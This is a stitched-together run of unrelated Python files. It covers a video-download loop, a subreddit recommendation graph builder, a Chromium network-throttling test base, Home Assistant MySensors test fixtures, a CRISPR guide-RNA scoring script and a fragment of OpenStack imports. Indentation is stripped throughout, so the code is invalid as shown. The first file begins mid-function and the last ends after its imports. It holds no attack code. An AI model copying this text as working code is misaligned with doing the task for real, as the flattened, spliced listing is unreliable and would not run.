before = start # start measuring
while True:
# Download and write
data_block = data.read(block_size if not is_test else min(block_size, data_len - byte_counter))
byte_counter += len(data_block)
# exit loop when download is finished
if len(data_block) == 0:
break
# Open destination file just in time
if stream is None:
try:
(stream, tmpfilename) = sanitize_open(tmpfilename, open_mode)
assert stream is not None
filename = self.undo_temp_name(tmpfilename)
self.report_destination(filename)
except (OSError, IOError) as err:
self.report_error('unable to open for writing: %s' % str(err))
return False
if self.params.get('xattr_set_filesize', False) and data_len is not None:
try:
import xattr
xattr.setxattr(tmpfilename, 'user.ytdl.filesize', str(data_len))
except(OSError, IOError, ImportError) as err:
self.report_error('unable to set filesize xattr: %s' % str(err))
try:
stream.write(data_block)
except (IOError, OSError) as err:
self.to_stderr('\n')
self.report_error('unable to write data: %s' % str(err))
return False
# Apply rate limit
self.slow_down(start, now, byte_counter - resume_len)
# end measuring of one loop run
now = time.time()
after = now
# Adjust block size
if not self.params.get('noresizebuffer', False):
block_size = self.best_block_size(after - before, len(data_block))
before = after
# Progress message
speed = self.calc_speed(start, now, byte_counter - resume_len)
if data_len is None:
eta = None
else:
eta = self.calc_eta(start, time.time(), data_len - resume_len, byte_counter - resume_len)
self._hook_progress({
'status': 'downloading',
'downloaded_bytes': byte_counter,
'total_bytes': data_len,
'tmpfilename': tmpfilename,
'filename': filename,
'eta': eta,
'speed': speed,
'elapsed': now - start,
})
if is_test and byte_counter == data_len:
break
if stream is None:
self.to_stderr('\n')
self.report_error('Did not get any data blocks')
return False
if tmpfilename != '-':
stream.close()
if data_len is not None and byte_counter != data_len:
raise ContentTooShortError(byte_counter, int(data_len))
self.try_rename(tmpfilename, filename)
# Update file modification time
if self.params.get('updatetime', True):
info_dict['filetime'] = self.try_utime(filename, data.info().get('last-modified', None))
self._hook_progress({
'downloaded_bytes': byte_counter,
'total_bytes': byte_counter,
'filename': filename,
'status': 'finished',
'elapsed': time.time() - start,
})
return True
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from graphviz import Digraph
import math
import pymongo
import argparse
import sys
import os
import pickle
class Recommender:
def __init__(self, depth=2, nsfw=False, verbose=False):
self.depth = depth
self.verbose = verbose
self.nsfw = nsfw
# These vary from graph to graph
self.edges = {}
self.censored_cnt = 0
# Alternate path for generated files
# Used in webapp to specify 'static' dir
self.output_path = ''
# Data structures used to construct d3 output json
self.d3_node_list = []
self.node_idx_map = {}
self.d3_edges = []
self.col = None
self.local_dict = {}
self.up_visited = {}
self.down_visited = {}
def msg(self, message):
""" Conditional print to console """
# A single point to check verbosity
if self.verbose:
print(message)
def load_dataset(self):
""" Setup db cursor and load cached data into memory """
# Load env variable MONGOCLIENT if set, otherwise set to localhost
uri = os.environ.get('MONGOCLIENT', 'localhost')
client = pymongo.MongoClient(uri)
db = client.redditgraph
self.col = db.subreddits
        # Load a local copy of accessed database records to mitigate Mongolab
        # response times
pickle_dict = "local_dict.pickle"
if os.path.exists(pickle_dict):
self.local_dict = pickle.load(open(pickle_dict, "rb"))
def query_db(self, sub_name):
""" Check the local cache, otherwise query remote db """
# Memoize database queries
if sub_name in self.local_dict:
sub = self.local_dict[sub_name]
# If local lookup fails do db lookup
if not sub:
del self.local_dict[sub_name]
sub = self.query_db(sub_name)
else:
sub = self.col.find_one({'name': sub_name})
self.local_dict[sub_name] = sub
return sub
def generate_graph(self, seed, render):
""" Create graph by connecting adjacent nodes """
        self.censored_cnt = 0
        # Ensure the generated filename indicates whether nsfw content is included
filename = seed + '_d' + str(self.depth)
filename = os.path.join(self.output_path, filename)
if self.nsfw:
filename += '_nsfw'
g = Digraph('G', format='png', filename=filename + '.gv')
sub = self.query_db(seed)
if not sub:
return ('Failure', 'Subreddit not in database, please try another subreddit')
seed_cnt = sub['subscribers']
if sub['up_links'] != []:
g = self.add_edges(g, seed, self.depth, up=True, reverse=False)
self.msg("Traversing up, then down")
up_links = sub['up_links']
for item in up_links:
                # Ignore a referrer that has fewer than 20% of the seed's subscribers
# Prevent very small subs from clustering about a huge one
# subreddit = self.query_db(item)
# if subreddit['subscribers'] < (seed_cnt * 0.2):
# continue
g = self.add_edges(g, item, self.depth - 1, up=True, reverse=True)
self.msg("Travsering straight down")
if sub['down_links'] != []:
g = self.add_edges(g, seed, self.depth)
if not len(self.edges):
return ('Failure', 'Graph is empty, please try another subreddit')
if self.censored_cnt >= 1:
self.msg('# of NSFW nodes removed: ' + str(self.censored_cnt))
# Draw graphviz graph
if render:
# Save graphviz file
g.save()
g.render(view=True)
# Save json for D3
filename = filename + '.json'
with open(filename, "wt") as d3:
print('{"nodes":[', end="", file=d3)
print(', '.join(self.d3_node_list), end="", file=d3)
print('], "links":[', end="", file=d3)
print(', '.join(self.d3_edges), end="", file=d3)
print(']}', end="", file=d3)
self.cleanup()
return ('Success', filename)
def add_edges(self, graph, seed, depth, up=False, reverse=False):
""" Add subreddits to graph as parent->child nodes through recusive lookup """
subreddit = self.query_db(seed)
if (depth == 0) or (not subreddit):
return graph
# Apply censor before wasting time
if subreddit['nsfw'] and not self.nsfw:
self.censored_cnt += 1
return graph
# Get current number of subscribers
seed_cnt = subreddit['subscribers']
# This is used once to get the sibling referers
# Rather than go straight up or down, go up one level and recurse down
if reverse:
up = not up
if up:
if seed in self.up_visited:
return graph
else:
self.up_visited[seed] = True
links = subreddit['up_links']
else:
if seed in self.down_visited:
return graph
else:
self.down_visited[seed] = True
links = subreddit['down_links']
self.msg('depth: ' + str(depth))
self.msg(seed)
self.msg(links)
# As we get further from the seed we need to be more careful
# about adding child nodes
distance = self.depth / depth
subs = links
for sub in subs:
# Error in database, ignoring now
if (sub == ':**') or (not sub):
continue
# If a child has less than 20% of the parent's subscribers filter it out
# This is to prevent too much clustering
new_link = self.query_db(sub)
if new_link:
new_cnt = new_link['subscribers']
if (new_cnt < (seed_cnt * 0.2 * distance)) and (self.depth - depth > 0):
continue
else:
continue
# If traversing up, change direction of nodes
if up:
a_node, b_node = sub, seed
a_cnt, b_cnt = new_cnt, seed_cnt
else:
a_node, b_node = seed, sub
a_cnt, b_cnt = seed_cnt, new_cnt
# Add an index for each node:
# d3 connects edges as idxA->idxB
# so we need to store their names and numbers (indices)
self.update_nodes(a_node, a_cnt)
self.update_nodes(b_node, b_cnt)
            # Keep graph simple by only adding unique edges
cur_edge = a_node + " -> " + b_node
self.msg(cur_edge)
            if cur_edge not in self.edges:
# Add edge for graphviz
graph.edge(a_node, b_node)
# Add edge for d3.js
self.d3_edges.append('{"source":' + str(self.node_idx_map[a_node]) +
',"target":' + str(self.node_idx_map[b_node]) +
',"value":' + str(depth) + '}')
# Save edge to ensure it can only be added once
self.edges[cur_edge] = True
# Recurse related subs until depth is exhausted
graph = self.add_edges(graph, sub, depth - 1, up)
# Save cache to disk
pickle.dump(self.local_dict, open("local_dict.pickle", "wb"))
return graph
def update_nodes(self, node, cnt):
        if node not in self.node_idx_map:
self.node_idx_map[node] = len(self.node_idx_map)
try:
            # Scale subscriber counts to emphasize order-of-magnitude differences
            # without letting large subs dominate the graph
            scale = math.ceil(math.log(cnt, 10))
            size = str(scale * scale)
        except (ValueError, TypeError):
            # math.log fails on zero, negative, or missing counts
            size = '10'
self.d3_node_list.append(
'{"name":"' + node + '", "subs":"' + size + '"}')
def cleanup(self):
self.edges = {}
self.censored_cnt = 0
def usage(parser):
""" Let the user know the expected runtime args """
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
def main():
""" Parse cli args and kick off graph generation """
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--depth', type=int, default=2,
help='Tree traversal depth')
parser.add_argument('-r', '--render', action='store_true', default=False,
help='Render graph')
parser.add_argument('-n', '--nsfw', action='store_true', default=False,
help='Allow over 18 subreddits as nodes')
parser.add_argument('-s', '--subreddit', required=True,
help='Root subreddit')
parser.add_argument('-v', '--verbose', action='store_true', default=False,
help='Show debugging')
usage(parser)
args = parser.parse_args()
recommender = Recommender(args.depth, args.nsfw, args.verbose)
recommender.load_dataset()
recommender.generate_graph(args.subreddit, args.render)
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Constrained network server (CNS) test base."""
import logging
import os
import Queue
import subprocess
import sys
import threading
import urllib2
import pyauto
import pyauto_paths
# List of commonly used network constraints settings.
# Each setting is a tuple of the form:
# ('TEST_NAME', [BANDWIDTH_Kbps, LATENCY_ms, PACKET_LOSS_%])
#
# Note: The test name should satisfy the regex [\w\.-]+ (check
# tools/perf_expectations/tests/perf_expectations_unittest.py for details). It
# is used to name the result graphs on the dashboards.
#
# The WiFi, DSL, and Cable settings were taken from webpagetest.org as
# approximations of their respective real world networks. The settings were
# based on 2011 FCC Broadband Data report (http://www.fcc.gov/document/
# measuring-broadband-america-report-consumer-broadband-performance-us).
DialUp = ('DialUp', [56, 120, 5])
Slow = ('Slow', [256, 105, 1])
Wifi = ('Wifi', [1024, 60, 0])
DSL = ('DSL', [1541, 50, 0])
Cable = ('Cable', [5120, 28, 0])
NoConstraints = ('NoConstraints', [0, 0, 0])
# Path to CNS executable relative to source root.
_CNS_PATH = os.path.join(
'media', 'tools', 'constrained_network_server', 'cns.py')
# Port to start the CNS on.
_CNS_PORT = 9000
# A flag to determine whether to launch a local CNS instance or to connect
# to the external CNS server. Default to False since all current bots use an
# external instance.
# If not on Windows, set USE_LOCAL_CNS=1 env variable to switch the flag.
USE_LOCAL_CNS = ('win' not in sys.platform and 'USE_LOCAL_CNS' in os.environ and
os.environ['USE_LOCAL_CNS'] == '1')
# Base CNS URL, only requires & separated parameter names appended.
if USE_LOCAL_CNS:
CNS_BASE_URL = 'http://127.0.0.1:%d/ServeConstrained?' % _CNS_PORT
else:
CNS_BASE_URL = 'http://chromeperf34:%d/ServeConstrained?' % _CNS_PORT
CNS_CLEANUP_URL = 'http://chromeperf34:%d/Cleanup' % _CNS_PORT
# Used for server sanity check.
_TEST_VIDEO = 'roller.webm'
# Directory root to serve files from.
_ROOT_PATH = os.path.join(pyauto.PyUITest.DataDir(), 'pyauto_private', 'media')
class CNSTestBase(pyauto.PyUITest):
"""CNS test base hadles startup and teardown of CNS server."""
def __init__(self, *args, **kwargs):
"""Initialize CNSTestBase by setting the arguments for CNS server.
Args:
Check cns.py command line argument list for details.
"""
self._port = kwargs.get('port', _CNS_PORT)
self._interface = kwargs.get('interface', 'lo')
self._www_root = kwargs.get('www_root', _ROOT_PATH)
self._verbose = kwargs.get('verbose', True)
self._expiry_time = kwargs.get('expiry_time', 0)
self._socket_timeout = kwargs.get('socket_timeout')
pyauto.PyUITest.__init__(self, *args, **kwargs)
def setUp(self):
"""Ensures the Constrained Network Server (CNS) server is up and running."""
if USE_LOCAL_CNS:
self._SetUpLocal()
else:
self._SetUpExternal()
def _SetUpExternal(self):
"""Ensures the test can connect to the external CNS server."""
if self.WaitUntil(self._CanAccessServer, retry_sleep=3, timeout=30,
debug=False):
pyauto.PyUITest.setUp(self)
else:
self.fail('Failed to connect to CNS.')
def _SetUpLocal(self):
"""Starts the CNS server locally."""
cmd = [sys.executable, os.path.join(pyauto_paths.GetSourceDir(), _CNS_PATH),
'--port', str(self._port),
'--interface', self._interface,
'--www-root', self._www_root,
'--expiry-time', str(self._expiry_time)]
if self._socket_timeout:
cmd.extend(['--socket-timeout', str(self._socket_timeout)])
if self._verbose:
cmd.append('-v')
logging.debug('Starting CNS server: %s ', ' '.join(cmd))
self._cns_process = subprocess.Popen(cmd, stderr=subprocess.PIPE)
ProcessLogger(self._cns_process)
if self.WaitUntil(self._CanAccessServer, retry_sleep=3, timeout=30,
debug=False):
pyauto.PyUITest.setUp(self)
else:
self.tearDown()
self.fail('Failed to start CNS.')
def _CanAccessServer(self):
"""Checks if the CNS server can serve a file with no network constraints."""
test_url = ''.join([CNS_BASE_URL, 'f=', _TEST_VIDEO])
try:
return urllib2.urlopen(test_url) is not None
except Exception:
return False
def tearDown(self):
"""Stops the Constrained Network Server (CNS)."""
if USE_LOCAL_CNS:
logging.debug('Stopping CNS server.')
# Do not use process.kill(), it will not clean up cns.
self.Kill(self._cns_process.pid)
# Need to wait since the process logger has a lock on the process stderr.
self._cns_process.wait()
self.assertFalse(self._cns_process.returncode is None)
logging.debug('CNS server stopped.')
else:
# Call CNS Cleanup to remove all ports created by this client.
self.NavigateToURL(CNS_CLEANUP_URL)
pyauto.PyUITest.tearDown(self)
class ProcessLogger(threading.Thread):
"""A thread to log a process's stderr output."""
def __init__(self, process):
"""Starts the process logger thread.
Args:
process: The process to log.
"""
threading.Thread.__init__(self)
self._process = process
self.start()
def run(self):
"""Adds debug statements for the process's stderr output."""
line = True
while line:
line = self._process.stderr.readline()
logging.debug(line.strip())
def GetFileURL(file_name, bandwidth=0, latency=0, loss=0, new_port=False):
"""Returns CNS URL for the file with specified constraints.
Args:
Check cns.ServeConstrained() args for more details.
"""
video_url = [CNS_BASE_URL, 'f=' + file_name]
if bandwidth > 0:
video_url.append('bandwidth=%d' % bandwidth)
if latency > 0:
video_url.append('latency=%d' % latency)
if loss > 0:
video_url.append('loss=%d' % loss)
if new_port:
video_url.append('new_port=%s' % new_port)
return '&'.join(video_url)
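# For example (illustrative): GetFileURL('roller.webm', bandwidth=256,
# latency=105, loss=1) joins the parts with '&', producing
# CNS_BASE_URL + '&f=roller.webm&bandwidth=256&latency=105&loss=1'.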
def CreateCNSPerfTasks(network_constraints_settings, test_media_files):
"""Returns a queue of tasks combinining network constrains with media files.
Args:
network_constraints_settings: List of (setting_name, setting_values)
        tuples.
test_media_files: List of media files to run the tests on.
"""
# Convert relative test path into an absolute path.
tasks = Queue.Queue()
for file_name in test_media_files:
for series_name, settings in network_constraints_settings:
logging.debug('Add test: %s\tSettings: %s\tMedia: %s', series_name,
settings, file_name)
tasks.put((series_name, settings, file_name))
return tasks
|
|
"""Provide common mysensors fixtures."""
from __future__ import annotations
from collections.abc import AsyncGenerator, Generator
import json
from typing import Any, Callable
from unittest.mock import MagicMock, patch
from mysensors.persistence import MySensorsJSONDecoder
from mysensors.sensor import Sensor
import pytest
from homeassistant.components.device_tracker.legacy import Device
from homeassistant.components.mqtt import DOMAIN as MQTT_DOMAIN
from homeassistant.components.mysensors import CONF_VERSION, DEFAULT_BAUD_RATE
from homeassistant.components.mysensors.const import (
CONF_BAUD_RATE,
CONF_DEVICE,
CONF_GATEWAY_TYPE,
CONF_GATEWAY_TYPE_SERIAL,
CONF_GATEWAYS,
DOMAIN,
)
from homeassistant.core import HomeAssistant
from homeassistant.setup import async_setup_component
from tests.common import MockConfigEntry, load_fixture
@pytest.fixture(autouse=True)
def device_tracker_storage(mock_device_tracker_conf: list[Device]) -> list[Device]:
"""Mock out device tracker known devices storage."""
devices = mock_device_tracker_conf
return devices
@pytest.fixture(name="mqtt")
def mock_mqtt_fixture(hass: HomeAssistant) -> None:
"""Mock the MQTT integration."""
hass.config.components.add(MQTT_DOMAIN)
@pytest.fixture(name="is_serial_port")
def is_serial_port_fixture() -> Generator[MagicMock, None, None]:
"""Patch the serial port check."""
with patch("homeassistant.components.mysensors.gateway.cv.isdevice") as is_device:
is_device.side_effect = lambda device: device
yield is_device
@pytest.fixture(name="gateway_nodes")
def gateway_nodes_fixture() -> dict[int, Sensor]:
"""Return the gateway nodes dict."""
return {}
@pytest.fixture(name="serial_transport")
async def serial_transport_fixture(
gateway_nodes: dict[int, Sensor],
is_serial_port: MagicMock,
) -> AsyncGenerator[dict[int, Sensor], None]:
"""Mock a serial transport."""
with patch(
"mysensors.gateway_serial.AsyncTransport", autospec=True
) as transport_class, patch("mysensors.AsyncTasks", autospec=True) as tasks_class:
tasks = tasks_class.return_value
tasks.persistence = MagicMock
mock_gateway_features(tasks, transport_class, gateway_nodes)
yield transport_class
def mock_gateway_features(
tasks: MagicMock, transport_class: MagicMock, nodes: dict[int, Sensor]
) -> None:
"""Mock the gateway features."""
async def mock_start_persistence() -> None:
"""Load nodes from via persistence."""
gateway = transport_class.call_args[0][0]
gateway.sensors.update(nodes)
tasks.start_persistence.side_effect = mock_start_persistence
async def mock_start() -> None:
"""Mock the start method."""
gateway = transport_class.call_args[0][0]
gateway.on_conn_made(gateway)
tasks.start.side_effect = mock_start
@pytest.fixture(name="transport")
def transport_fixture(serial_transport: MagicMock) -> MagicMock:
"""Return the default mocked transport."""
return serial_transport
@pytest.fixture(name="serial_entry")
async def serial_entry_fixture(hass: HomeAssistant) -> MockConfigEntry:
"""Create a config entry for a serial gateway."""
entry = MockConfigEntry(
domain=DOMAIN,
data={
CONF_GATEWAY_TYPE: CONF_GATEWAY_TYPE_SERIAL,
CONF_VERSION: "2.3",
CONF_DEVICE: "/test/device",
CONF_BAUD_RATE: DEFAULT_BAUD_RATE,
},
)
return entry
@pytest.fixture(name="config_entry")
def config_entry_fixture(serial_entry: MockConfigEntry) -> MockConfigEntry:
"""Provide the config entry used for integration set up."""
return serial_entry
@pytest.fixture
async def integration(
hass: HomeAssistant, transport: MagicMock, config_entry: MockConfigEntry
) -> AsyncGenerator[tuple[MockConfigEntry, Callable[[str], None]], None]:
"""Set up the mysensors integration with a config entry."""
device = config_entry.data[CONF_DEVICE]
config: dict[str, Any] = {DOMAIN: {CONF_GATEWAYS: [{CONF_DEVICE: device}]}}
config_entry.add_to_hass(hass)
def receive_message(message_string: str) -> None:
"""Receive a message with the transport.
The message_string parameter is a string in the MySensors message format.
"""
gateway = transport.call_args[0][0]
# node_id;child_id;command;ack;type;payload\n
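        # e.g. "1;1;1;0;23;43\n" is an illustrative set command (command 1)
        # for node 1, child 1, with type 23 and payload 43.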
gateway.logic(message_string)
with patch("homeassistant.components.mysensors.device.UPDATE_DELAY", new=0):
await async_setup_component(hass, DOMAIN, config)
await hass.async_block_till_done()
yield config_entry, receive_message
def load_nodes_state(fixture_path: str) -> dict:
"""Load mysensors nodes fixture."""
return json.loads(load_fixture(fixture_path), cls=MySensorsJSONDecoder)
def update_gateway_nodes(
gateway_nodes: dict[int, Sensor], nodes: dict[int, Sensor]
) -> dict:
"""Update the gateway nodes."""
gateway_nodes.update(nodes)
return nodes
@pytest.fixture(name="gps_sensor_state", scope="session")
def gps_sensor_state_fixture() -> dict:
"""Load the gps sensor state."""
return load_nodes_state("mysensors/gps_sensor_state.json")
@pytest.fixture
def gps_sensor(gateway_nodes: dict[int, Sensor], gps_sensor_state: dict) -> Sensor:
"""Load the gps sensor."""
nodes = update_gateway_nodes(gateway_nodes, gps_sensor_state)
node = nodes[1]
return node
@pytest.fixture(name="power_sensor_state", scope="session")
def power_sensor_state_fixture() -> dict:
"""Load the power sensor state."""
return load_nodes_state("mysensors/power_sensor_state.json")
@pytest.fixture
def power_sensor(gateway_nodes: dict[int, Sensor], power_sensor_state: dict) -> Sensor:
"""Load the power sensor."""
nodes = update_gateway_nodes(gateway_nodes, power_sensor_state)
node = nodes[1]
return node
@pytest.fixture(name="energy_sensor_state", scope="session")
def energy_sensor_state_fixture() -> dict:
"""Load the energy sensor state."""
return load_nodes_state("mysensors/energy_sensor_state.json")
@pytest.fixture
def energy_sensor(
gateway_nodes: dict[int, Sensor], energy_sensor_state: dict
) -> Sensor:
"""Load the energy sensor."""
nodes = update_gateway_nodes(gateway_nodes, energy_sensor_state)
node = nodes[1]
return node
@pytest.fixture(name="sound_sensor_state", scope="session")
def sound_sensor_state_fixture() -> dict:
"""Load the sound sensor state."""
return load_nodes_state("mysensors/sound_sensor_state.json")
@pytest.fixture
def sound_sensor(gateway_nodes: dict[int, Sensor], sound_sensor_state: dict) -> Sensor:
"""Load the sound sensor."""
nodes = update_gateway_nodes(gateway_nodes, sound_sensor_state)
node = nodes[1]
return node
@pytest.fixture(name="distance_sensor_state", scope="session")
def distance_sensor_state_fixture() -> dict:
"""Load the distance sensor state."""
return load_nodes_state("mysensors/distance_sensor_state.json")
@pytest.fixture
def distance_sensor(
gateway_nodes: dict[int, Sensor], distance_sensor_state: dict
) -> Sensor:
"""Load the distance sensor."""
nodes = update_gateway_nodes(gateway_nodes, distance_sensor_state)
node = nodes[1]
return node
@pytest.fixture(name="temperature_sensor_state", scope="session")
def temperature_sensor_state_fixture() -> dict:
"""Load the temperature sensor state."""
return load_nodes_state("mysensors/temperature_sensor_state.json")
@pytest.fixture
def temperature_sensor(
gateway_nodes: dict[int, Sensor], temperature_sensor_state: dict
) -> Sensor:
"""Load the temperature sensor."""
nodes = update_gateway_nodes(gateway_nodes, temperature_sensor_state)
node = nodes[1]
return node
|
|
import msgpack
import json
import pickle
import os.path
from Queue import PriorityQueue
import re
import doench_score
import azimuth.model_comparison
import numpy as np
import pandas as pd
import csv
from intervaltree import IntervalTree
class GuideRNA():
"""Holder of gRNA information"""
def __init__(self, selected, start, seq, PAM, score, exon_ranking, ensembl_gene, gene_name, functional_domain=None):
self.start = start
self.seq = seq
self.PAM = PAM
self.score = score
self.exon_ranking = exon_ranking
self.ensembl_gene = ensembl_gene
self.gene_name = gene_name
self.selected = selected
self.functional_domain = functional_domain
def serialize_for_display(self):
"""Serialize for the way we are returning json"""
serialization = {
"score": self.score,
"start": self.start,
"seq": self.seq,
"PAM": self.PAM,
"selected": self.selected,
}
        if self.functional_domain is not None:
serialization["functional_domain"] = self.functional_domain
return serialization
def __cmp__(self, other):
return cmp(self.score, other.score)
params = {
"PAM": "NGG",
"protospacer_len": 20,
"prime5": True,
"scoring": "Azimuth",
"quantity": 100,
"functional_domains": True
}
# azimuth model
azimuth_saved_model_dir = os.path.join(os.path.dirname(azimuth.__file__), 'saved_models')
model_name = 'V3_model_full.pickle'
azimuth_model_file = os.path.join(azimuth_saved_model_dir, model_name)
with open(azimuth_model_file, 'rb') as f:
azimuth_model = pickle.load(f)
# Create interval tree for functional domains
print "constructing interval tuples"
interval_tuples_dict = {}
ucsc_pfam_f = '../functional_domains/ucsc_pfam_GRCm38.txt'
with open(ucsc_pfam_f, 'r') as pfam_csv:
csvreader = csv.reader(pfam_csv, delimiter='\t')
next(csvreader) # skip header
for row in csvreader:
chrom = row[1]
start = row[2]
end = row[3]
name = row[4]
if chrom not in interval_tuples_dict:
interval_tuples_dict[chrom] = []
new_tuple = (int(start), int(end), name)
interval_tuples_dict[chrom].append(new_tuple)
print "constructing interval trees"
interval_trees_dict = {}
for k, v in interval_tuples_dict.iteritems():
interval_trees_dict[k] = IntervalTree.from_tuples(v)
modPAM = params["PAM"]
modPAM = modPAM.replace('N', '[ATCG]')
params["modPAM"] = modPAM
params["PAM_len"] = len(params["PAM"])
revcompl = lambda x: ''.join([{'A':'T','C':'G','G':'C','T':'A','N':'N'}[B] for B in x][::-1])
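# For example: revcompl('ATCG') == 'CGAT' (complement each base, then
# reverse the sequence).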
print "constructing refGene"
refGeneFilename = '../gtex/gtex_mouse/refGene_mouse.txt'
refGene = pd.read_csv(refGeneFilename, sep="\t")
refGene.columns=['','name','chrom','strand','txStart','txEnd','cdsStart','cdsEnd','exonCount','exonStarts','exonEnds','id','name2','cdsStartStat','cdsEndStat','exonFrames']
refGene["exonStarts"] = refGene.apply(lambda x: x['exonStarts'].split(',')[:-1], axis=1)
refGene["exonEnds"] = refGene.apply(lambda x: x['exonEnds'].split(',')[:-1], axis=1)
refGene["exonFrames"] = refGene.apply(lambda x: x['exonFrames'].split(',')[:-1], axis=1)
def gene_exon_coords(gene_name, exon):
try:
location = refGene.loc[refGene['name2'] == gene_name]
start = list(location['exonStarts'])[-1][exon]
end = list(location['exonEnds'])[-1][exon]
chrom = list(location['chrom'])[-1]
return {
'start': int(start),
'end': int(end),
'chrom': str(chrom)
}
except IndexError:
return None
def gene_exon_file(gene, exon):
filename = gene + "_" + str(exon)
seq_path = os.path.join('../GRCm38_exons/', filename)
if os.path.isfile(seq_path):
with open(seq_path) as infile:
return infile.read().upper()
else:
return None
with open('genes_list_GRCm38.txt') as genes_list_file:
genes_list = genes_list_file.read().split('\n')
# gene format: {"ensembl_id": "ENSG00000261122.2", "name": "5S_rRNA", "description": ""}
for gene_name in genes_list:
exon = 0
seq = gene_exon_file(gene_name, exon)
coords = gene_exon_coords(gene_name, exon)
while seq and coords:
        # Skip exons already processed in a previous run of the program
outfile_name = gene_name + "_" + str(exon) + ".p"
folder = '../GRCm38_guides_msgpack_' + params["scoring"] + '/'
if params['functional_domains']:
folder = '../GRCm38_guides_msgpack_' + params['scoring'] + '_domains/'
output_path = os.path.join(folder, outfile_name)
if os.path.isfile(output_path):
# prepare next exon
exon += 1
seq = gene_exon_file(gene_name, exon)
coords = gene_exon_coords(gene_name, exon)
continue
q = PriorityQueue()
domain_q = PriorityQueue()
def process_guide(m, selected, max_queue_size, seq, domain):
if 'N' in seq:
return
PAM_start = m.start()
score = 0
if params["scoring"] == "Doench":
# Doench score requires the 4 before and 6 after 20-mer (gives 30-mer)
mer30 = seq[PAM_start-params["protospacer_len"]-4:PAM_start+params["PAM_len"]+3]
if len(mer30) == 30:
score = doench_score.calc_score(mer30)
elif params["scoring"] == "Azimuth":
# Azimuth requires the 4 before and 6 after 20-mer (gives 30-mer)
mer30 = seq[PAM_start-params["protospacer_len"]-4:PAM_start+params["PAM_len"]+3]
if len(mer30) == 30:
score = azimuth.model_comparison.predict(np.array([mer30]), aa_cut=None, percent_peptide=None, model=azimuth_model, model_file=azimuth_model_file)[0]
protospacer = ""
PAM = ""
if params["prime5"]:
protospacer = seq[PAM_start-params["protospacer_len"]:PAM_start]
PAM = seq[PAM_start:PAM_start+params["PAM_len"]]
else:
protospacer = seq[PAM_start+params["PAM_len"]:PAM_start+params["PAM_len"]+params["protospacer_len"]]
PAM = seq[PAM_start:PAM_start+params["PAM_len"]]
potential_gRNA = GuideRNA(selected, PAM_start-params["protospacer_len"], protospacer, PAM, score, exon, gene_name, gene_name, domain)
if domain:
domain_q.put(potential_gRNA)
# If there's enough room, add it, no question.
elif q.qsize() < max_queue_size:
q.put(potential_gRNA)
# Otherwise, take higher score
else:
lowest_gRNA = q.get()
if potential_gRNA.score > lowest_gRNA.score:
q.put(potential_gRNA)
else:
q.put(lowest_gRNA)
for m in re.finditer(params["modPAM"], seq):
if params["prime5"] and (m.start() < params["protospacer_len"] or m.start() + params["PAM_len"] > len(seq)):
continue
elif not params["prime5"] and (m.start() + params["PAM_len"] + params["protospacer_len"] > len(seq)):
continue
# Functional domains currently only supported for Cas9.
# This needs to be modified for other genome editing proteins.
domain = None
if params["PAM"] == "NGG" and params["functional_domains"]: # spCas9
cut_site = coords['start'] + m.start() - 3
chrom = coords['chrom']
if chrom in interval_trees_dict:
domain_matches = list(interval_trees_dict[chrom][cut_site])
if len(domain_matches) > 0:
domain = domain_matches[0].data
process_guide(m, True, params["quantity"], seq, domain)
seq_rc = revcompl(seq)
for m in re.finditer(params["modPAM"], seq_rc):
if params["prime5"] and (m.start() < params["protospacer_len"] or m.start() + params["PAM_len"] > len(seq)):
continue
elif not params["prime5"] and (m.start() + params["PAM_len"] + params["protospacer_len"] > len(seq)):
continue
# Functional domains currently only supported for Cas9.
# This needs to be modified for other genome editing proteins.
domain = None
if params["PAM"] == "NGG" and params["functional_domains"]: #spCas9
cut_site = coords['end'] - m.start() + 3
chrom = coords['chrom']
if chrom in interval_trees_dict:
domain_matches = list(interval_trees_dict[chrom][cut_site])
if len(domain_matches) > 0:
domain = domain_matches[0].data
process_guide(m, True, params["quantity"], seq_rc, domain)
        # Pop gRNAs into our 'permanent' storage.
        # Guides that hit a functional domain are preferred, so drain
        # domain_q first and then top up with ordinary guides from q;
        # capturing domain_count between the two loops keeps the summary
        # below (domain vs. ordinary) accurate.
        count = 0
        gRNAs = []
        while not domain_q.empty() and count < params["quantity"]:
            gRNA = domain_q.get()
            gRNAs.append(gRNA.serialize_for_display())
            count = count + 1
        domain_count = count
        while not q.empty() and count < params["quantity"]:
            gRNA = q.get()
            gRNAs.append(gRNA.serialize_for_display())
            count = count + 1
        outfile_name = gene_name + "_" + str(exon) + ".p"
        if domain_count > 0:
            print("for {0} we had {1} domain and {2} ordinary guides.".format(outfile_name, domain_count, count - domain_count))
folder = '../GRCm38_guides_msgpack_' + params['scoring'] + '/'
if params['functional_domains']:
folder = '../GRCm38_guides_msgpack_' + params['scoring'] + '_domains/'
output_path = os.path.join(folder, outfile_name)
with open(output_path, 'w') as outfile:
# Reverse gRNAs list.
# Want highest on-target first.
msgpack.dump(gRNAs[::-1], outfile)
# prepare next exon
exon += 1
seq = gene_exon_file(gene_name, exon)
coords = gene_exon_coords(gene_name, exon)
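# Hedged sketch (not part of the original script): GuideRNA and revcompl are
# defined elsewhere in this project. For the PriorityQueue bookkeeping above
# to behave -- q.get() must yield the *lowest*-scoring guide so it can be
# evicted in favour of a better one -- GuideRNA must order ascending by
# score, along these lines (illustrative names, not the real definitions):
class _GuideRNASketch(object):
    def __init__(self, score):
        self.score = score

    def __lt__(self, other):
        # PriorityQueue pops the smallest item first, i.e. the worst guide.
        return self.score < other.score


def _revcompl_sketch(seq):
    # Assumed behaviour of revcompl: reverse complement over ACGTN.
    complement = {'A': 'T', 'T': 'A', 'G': 'C', 'C': 'G', 'N': 'N'}
    return ''.join(complement[base] for base in reversed(seq))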
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import errno
import functools
import os
import shutil
import subprocess
import sys
import tempfile
import threading
import time
import weakref
from oslo.config import cfg
